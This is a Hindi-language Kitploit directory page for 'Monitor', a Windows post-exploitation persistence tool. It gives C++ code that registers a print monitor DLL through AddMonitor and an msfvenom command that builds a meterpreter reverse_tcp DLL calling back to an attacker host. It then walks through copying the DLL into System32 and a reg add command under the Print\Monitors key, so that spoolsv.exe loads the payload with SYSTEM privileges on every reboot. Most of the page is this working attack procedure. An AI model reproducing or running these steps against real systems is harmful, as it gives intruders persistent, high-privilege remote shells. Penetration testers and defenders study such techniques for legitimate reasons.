Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Monitor — दृढ़ता का एक पुराना तरीका | Kitploit
उपकरण/GitHubGitHub/al1ex/monitor
विशेषाधिकार वृद्धिपेलोड जनरेशनस्थायित्व तंत्रशोषणपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंग
GitHubal1ex/monitor

Monitor

दृढ़ता का एक पुराना तरीका

रिपॉजिटरी देखें
531045 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परियोजना विवरण

पोस्ट-एक्सप्लॉइटेशन चरण में विशेषाधिकार स्थायित्व प्राप्त करने के लिए उपयोग किया जाता है।

परियोजना उपयोग

Step1: इस परियोजना को डाउनलोड करें, उसके बाद VS का उपयोग करके Monitor.cpp को कंपाइल करें। बेशक, पहले से कंपाइल की गई फ़ाइल का भी उपयोग कर सकते हैं। Monitor.cpp का कोड निम्नानुसार है:

root@kitploit:~
#include "Windows.h"

int main() {
	MONITOR_INFO_2 monitorInfo;
	TCHAR env[12] = TEXT("Windows x64");
	TCHAR name[12] = TEXT("Monitor");
	TCHAR dll[12] = TEXT("test.dll");
	monitorInfo.pName = name;
	monitorInfo.pEnvironment = env;
	monitorInfo.pDLLName = dll;
	AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
	return 0;
}
  • pName //मॉनिटर का नाम
  • pEnvironment //पर्यावरण आर्किटेक्चर
  • pDLLName //मॉनिटर DLL फ़ाइल का नाम

Step 2: DLL हमला पेलोड उत्पन्न करने के लिए Msfvenom का उपयोग करें:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f dll > shell.dll

test_dll

Step 3: shell.dll को लक्ष्य होस्ट की system32 निर्देशिका में कॉपी करें, उसके बाद इसे test.dll में नाम बदलें (यानी उपरोक्त PDLLName; आप इसे अपनी पसंद के अनुसार भी बदल सकते हैं, जैसा चाहें वैसा ही)।

root@kitploit:~
copy C:\temp\shell.dll C:\Windows\System32\test.dll

copy

Step 4: उसके बाद system32 निर्देशिका में जाएं, और निम्न कमांड निष्पादित करें (Monitors.exe पहले से कंपाइल की गई फ़ाइल है, इसे भी system32 निर्देशिका में रखना होगा):

root@kitploit:~
Monitors.exe

Monitor

Step 5: उसके बाद सफलतापूर्वक Meterpreter सत्र प्राप्त होता है

Meterpreter

स्थायित्व (Persistence) कार्यान्वयन

स्थायित्व प्राप्त करने के लिए, हमें "Monitors" रजिस्ट्री स्थान के अंतर्गत एक key सेट करने की आवश्यकता है:

root@kitploit:~
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

उसके बाद कमांड लाइन में निम्न कमांड निष्पादित करके एक रजिस्ट्री प्रविष्टि बनाएं, जिसमें मान test.dll शामिल होगा। रजिस्ट्री संपादक से रजिस्ट्री देखकर सत्यापित करें कि key बनाई गई है या नहीं:

root@kitploit:~
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ

regedit

अगली बार रीस्टार्ट करने पर, spoolsv.exe प्रक्रिया Monitors रजिस्ट्री प्रविष्टि में मौजूद तथा Windows फ़ोल्डर की System32 में संग्रहीत सभी ड्राइवर DLL फ़ाइलों को लोड करेगी। नीचे दिया गया चित्र दर्शाता है कि Meterpreter सत्र ने Print Spooler सेवा (SYSTEM) के समान स्तर का विशेषाधिकार स्थापित कर लिया है, और इसे System32 फ़ोल्डर से निष्पादित किया गया है।

shell

टूल डाउनलोड करें